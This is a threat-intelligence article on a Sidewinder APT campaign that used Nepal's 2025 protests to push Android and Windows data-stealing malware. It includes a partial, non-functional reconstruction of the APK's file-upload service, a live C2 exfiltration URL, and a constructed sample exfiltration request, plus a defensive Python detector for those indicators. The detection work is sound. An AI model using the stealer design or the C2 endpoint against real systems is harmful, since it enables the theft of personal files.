Sidewinder APT Hackers Leverage Nepal Protests to Push Mobile and Windows Malware

The eruption of widespread protests across Nepal in early September 2025 provided fertile ground for a sophisticated campaign orchestrated by the Sidewinder APT group.

As demonstrators mobilized against government policies and social media restrictions, threat actors exploited the turbulence to distribute malicious applications masquerading as legitimate emergency services.

Victims seeking live updates or assistance were enticed by realistic impersonations of Nepalese authorities, only to install malware that siphoned sensitive data from both mobile and Windows environments.

Sidewinder's operation relies on a two-pronged delivery mechanism. On Android devices, victims encounter phishing websites that spoof the Nepalese Emergency Service login page.

[Figure: Spoofing the emergency service for credential phishing (Source – StrikeReady)]

Once credentials are entered, the site redirects to an APK download, typically named Gen_Ashok_Sigdel_Live.apk, which users install believing it will give them access to live news.

[Figure: Acting head of Nepal (Source – StrikeReady)]

Meanwhile, Windows users download EmergencyApp.exe from a cloned Emergency Helpline portal (Figure 6). Both binaries request extensive permissions (file system access, microphone, camera) to facilitate data exfiltration.

StrikeReady Labs analysts noted the group’s deliberate use of geopolitical events to maximize engagement, embedding the malicious payload within decoy content fetched from reputable outlets such as Al Jazeera.

[Figure: APK decoy content (Source – StrikeReady)]

These decoys lend credibility to the operation and help the malware pass cursory inspection by non-technical users. Once installed, the mobile backdoor starts a service that selects document and image files for exfiltration.

The Windows variant operates similarly, spawning background tasks that harvest files with extensions like .docx, .pdf, and .xlsx.

Infection Mechanism and Permission Abuse

A closer examination of the Android sample reveals a multi-threaded FileUploadService class responsible for data theft.

[Figure: Examination of data theft filters as well as infra (Source – StrikeReady)]

Upon execution, the service creates an ExecutorService backed by a fixed pool of fifteen worker threads and submits one task per target extension. Each task scans device storage for files matching that document or image extension and uploads them:

import android.app.Service;
import android.content.Intent;
import android.os.IBinder;

import java.util.Arrays;
import java.util.List;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;

// Reconstruction of the APK's data-theft service as described in the analysis above.
public class FileUploadService extends Service {
  // Fixed pool of fifteen worker threads for parallel scanning and upload.
  private static final int THREAD_COUNT = 15;
  // Document and image extensions the service hunts for on device storage.
  private final List<String> docExts = Arrays.asList(".txt", ".pdf", ".docx", ".xlsx");
  private final List<String> imgExts = Arrays.asList(".jpg", ".png");
  private ExecutorService executorService;

  @Override
  public int onStartCommand(Intent intent, int flags, int startId) {
    executorService = Executors.newFixedThreadPool(THREAD_COUNT);
    scanAndUpload();
    // START_STICKY asks Android to recreate the service if the process is killed.
    return START_STICKY;
  }

  @Override
  public IBinder onBind(Intent intent) {
    return null; // started (not bound) service
  }

  private void scanAndUpload() {
    // One task per extension; each task walks storage and uploads matching files.
    for (String ext : docExts) {
      executorService.submit(() -> uploadFiles(ext));
    }
    for (String ext : imgExts) {
      executorService.submit(() -> uploadFiles(ext));
    }
  }

  // Walks device storage for files ending in ext and POSTs them as multipart
  // form data to the C2 endpoint. The body is not reproduced in the write-up.
  private void uploadFiles(String ext) {
  }
}

Once files are identified, they are bundled into HTTP POST requests as multipart form data using a hard-coded boundary string (----qwerty). The boundary is visible in the network capture and is distinctive enough to signature on.

[Figure: pcap showing the signature-able ‘qwerty’ boundary (Source – StrikeReady)]

All stolen files are sent to https://playservicess.com/dtta/files.php, a C2 endpoint controlled by Sidewinder. Persistence is maintained through Android’s foreground service notifications and Windows autostart registry entries.

By pairing convincing user interfaces with abuse of high-level permissions, Sidewinder achieves a stealthy infection vector capable of compromising enterprise and personal devices alike.

Security teams should monitor for the known IOC domain (playservicess.com) and its /dtta/files.php upload path, suspicious APK installations from outside the official store, and anomalous outbound multipart POST traffic, in particular requests carrying the ----qwerty boundary.
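The following is an added detection example, not code from the StrikeReady analysis or from the malware. It parses raw HTTP POST requests (for instance as reassembled from a pcap or a proxy log) and flags the three indicators the write-up documents: the C2 host playservicess.com, the /dtta/files.php upload path, and the hard-coded ----qwerty multipart boundary. It also pulls the filenames out of the multipart parts so an analyst can see what was exfiltrated. The two sample requests are constructed for the example; the benign one uses a made-up intranet host and a browser-style boundary.

```python
import re
from dataclasses import dataclass, field

# Indicators taken from the analysis above.
C2_HOST = "playservicess.com"
C2_PATH = "/dtta/files.php"
C2_BOUNDARY = "----qwerty"


@dataclass
class Finding:
    host: str
    path: str
    reasons: list = field(default_factory=list)   # why the request was flagged
    filenames: list = field(default_factory=list) # files carried in the multipart body

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].decode(errors="replace").split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode(errors="replace").partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def multipart_boundary(content_type: str):
    """Extract the boundary parameter from a multipart/form-data Content-Type."""
    m = re.search(r'boundary="?([^";]+)"?', content_type or "")
    return m.group(1) if m else None


def multipart_filenames(body: bytes, boundary: str):
    """Return the filename="..." values of every part in the body."""
    names = []
    # Parts are delimited by "--" followed by the boundary (RFC 2046).
    for part in body.split(b"--" + boundary.encode()):
        m = re.search(rb'filename="([^"]*)"', part)
        if m:
            names.append(m.group(1).decode(errors="replace"))
    return names


def inspect_request(raw: bytes) -> Finding:
    method, path, headers, body = parse_http_request(raw)
    host = headers.get("host", "").lower()
    finding = Finding(host=host, path=path)
    if host == C2_HOST or host.endswith("." + C2_HOST):
        finding.reasons.append("known C2 domain")
    if path == C2_PATH:
        finding.reasons.append("known C2 upload endpoint")
    boundary = multipart_boundary(headers.get("content-type", ""))
    if method == "POST" and boundary:
        finding.filenames = multipart_filenames(body, boundary)
        if boundary == C2_BOUNDARY:
            finding.reasons.append("hard-coded multipart boundary")
    return finding


def scan(requests):
    """Inspect a list of raw requests; returns one Finding per request."""
    return [inspect_request(r) for r in requests]


# Constructed sample: an exfiltration POST shaped like the one in the write-up.
MALICIOUS_POST = (
    b"POST /dtta/files.php HTTP/1.1\r\n"
    b"Host: playservicess.com\r\n"
    b"Content-Type: multipart/form-data; boundary=----qwerty\r\n"
    b"\r\n"
    b"------qwerty\r\n"
    b'Content-Disposition: form-data; name="file"; filename="salary.xlsx"\r\n'
    b"Content-Type: application/octet-stream\r\n\r\n"
    b"PK\x03\x04...\r\n"
    b"------qwerty\r\n"
    b'Content-Disposition: form-data; name="file"; filename="IMG_0412.jpg"\r\n'
    b"Content-Type: image/jpeg\r\n\r\n"
    b"\xff\xd8\xff\xe0...\r\n"
    b"------qwerty--\r\n"
)

# Constructed sample: a legitimate browser upload (hypothetical intranet host).
BENIGN_POST = (
    b"POST /upload HTTP/1.1\r\n"
    b"Host: intranet.example.com\r\n"
    b"Content-Type: multipart/form-data; boundary=WebKitFormBoundary7MA4YWxk\r\n"
    b"\r\n"
    b"--WebKitFormBoundary7MA4YWxk\r\n"
    b'Content-Disposition: form-data; name="avatar"; filename="me.png"\r\n'
    b"Content-Type: image/png\r\n\r\n"
    b"\x89PNG\r\n"
    b"--WebKitFormBoundary7MA4YWxk--\r\n"
)

if __name__ == "__main__":
    for f in scan([MALICIOUS_POST, BENIGN_POST]):
        status = "ALERT" if f.suspicious else "ok"
        print(f"{status}: {f.host}{f.path} reasons={f.reasons} files={f.filenames}")
```

The boundary string on its own is the weakest of the three indicators (a future build can change it in one line), so treat it as corroborating evidence and alert with confidence when it coincides with the domain or the upload path. The domain match also catches subdomains, since operators commonly rotate hostnames under a registered domain they control.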




About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.